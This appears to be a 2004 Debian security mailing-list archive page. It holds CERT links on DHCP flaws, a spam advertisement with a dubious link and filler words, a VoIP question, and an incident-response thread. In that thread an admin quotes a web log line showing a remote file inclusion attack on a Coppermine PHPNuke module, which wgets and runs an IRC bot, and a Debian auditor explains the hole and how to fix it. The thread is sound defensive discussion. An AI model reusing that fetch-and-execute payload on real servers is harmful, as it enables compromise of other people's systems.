ISC DHCP3 Certs (yes multiple)

2004-06-23 Thread Greg Folkert 
http://www.kb.cert.org/vuls/id/654390

http://www.kb.cert.org/vuls/id/317350

Look like uploads are in incoming.d.o ATM. 1517 UTC
-- 
[EMAIL PROTECTED]
REMEMBER ED CURRY! http://www.iwethey.org/ed_curry

Novell's Directory Services is a competitive product to Microsoft's
Active Directory in much the same way that the Saturn V is a competitive
product to those dinky little model rockets that kids light off down at
the playfield. -- Thane Walkup


signature.asc
Description: This is a digitally signed message part

gonad cups over 79

2004-06-23 Thread Edwin Muniz 
conner,innocent

75%off for all New Softwares.
WindowXP,Photoshop,Window2003...etcMore

http://www.completely.vm.non-chalantly.mhcnjcnn.info/?Aj6FCRA7kEbZS44wobbly

swanson colon measle bright isis droll lamplight paranormal handsome agree inclose 
palfrey conception suffrage andiron decent shovel deuterate ornery wv chick 
seventeenth snip adele consultant

Info on Voip Gateways SIP and H323

2004-06-23 Thread Ip2Tel - Newton Medina 












Thank you 



Kind Regards





IP2Tel
Brasil - ITN info Group 

Newton Medina Celli JĂșnior

55.11.3083.0835

www.ip2tel.com

www.itn.com.br











---
Outgoing mail is certified Virus Free - ITN Info
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.708 / Virus Database: 464 - Release Date: 18/6/2004

Re: Info on Voip Gateways SIP and H323

2004-06-23 Thread Alvin Oga 

hi ya newton

On Wed, 23 Jun 2004, Ip2Tel - Newton Medina wrote:

 Thank you 

are you looking for general info or security info on sip/h323

http://linux-voip.net/Testing/

have fun
alvin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-23 Thread Ross Tsolakidis 
Thanks for all your help.
The dodgy code has been removed and the server secured !

Thanks again !

--
Ross


-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Saturday, 19 June 2004 11:24 AM
To: Ross Tsolakidis
Cc: [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
 Hi all,
 
 I did a search in the logs on some of the suspicious users and found a
 match.
 The files that are being downloaded then executed see to be IRC bots.
 http://www.energymech.net/
 
 Here are some log files.
 
 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET

/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe

la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
 vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0
200
 6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

 
 All those executables in the /tmp dir seem to be all coming from that
 site on our box, definitely the culprit.
 
 Can someone explain what is going on here ?
 Cause it doesn't make any sense.

  There seems to be some buggy PHP code being used on that site, which 
 is allowing the remote inclusion of  content from the mirabella.net 
 site - this is being abused to run code upon your host.

  You should immediately disable the coppermine PHPNuke module and
 get it patched, upgraded, or replaced.

  Going to securityfocus.com and searching the mailing lists for
 coppermine pulls up multiple hits describing problems - for example
 this post:

http://www.securityfocus.com/archive/1/361976

  Notice the URLs on section E2?  They match yours..

  See this one for more details too:

http://www.securityfocus.com/archive/1/361976

  Two things you can do immediately to stop this particular exploit
 are run safe mode for PHP, and firewall off access to mirabella.net.

 What steps should I take now ?

  Remove PHP Nuke, check the logs for other activity, make sure your
 kernel is patched against local root via the recent wholes, and
 look at using a locked down PHP installation - I'm not sure how
 PHPNuke will work with that, but it's gotta be worth a try.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.